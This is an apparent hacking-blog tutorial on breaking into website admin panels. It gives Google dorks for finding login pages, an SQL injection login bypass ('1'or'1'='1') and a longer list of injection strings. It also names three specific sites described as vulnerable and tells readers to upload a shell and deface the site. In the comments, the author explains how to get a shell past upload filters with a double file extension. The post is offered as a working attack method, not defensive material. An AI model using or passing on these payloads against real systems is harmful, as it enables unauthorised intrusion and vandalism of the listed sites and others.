Sign up for FREE daily Updates.

Hack Website's Admin Panel using Basic SQL Injection





You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)




Share this article :
 

+ comments + 9 comments

12 January 2012 03:11

Thanks for Sharing Knowledgeable information.it should be very helpful.
learn how to hack

14 January 2012 12:03

Thanks.. :D

28 January 2012 03:38

i get in the site but how to manage html files i mean how to edit them??

28 January 2012 19:52

Find a place to upload a image
then upload your php or asp shell.. if the website doesnt allow upload .php or .asp files
change the extension from .php
or .asp to .php.jpg or .asp.jpg ... when
your shell is uploaded you can edit
files.. or root the site.. . !! We will soon
write a post on how to upload
your .php.jpg or .asp.jpg shell..

30 January 2012 04:25

and if there is no photo uploader?

7 February 2012 04:07

Find a place to update news.. from there also you can upload your own shell.. !! soon will write a tutorial on that so stay tuned..

15 February 2012 11:32

cool.......post.......
thanks...keep on

18 February 2012 02:20

Thanks. Share this with your friends.

19 March 2014 11:05

how to stop it on our site

Post a Comment

 
Support : Blog | Hacking-Sec | PHP-Sec
Copyright © 2014. Hacking-Sec - All Rights Reserved

UA-55004066-1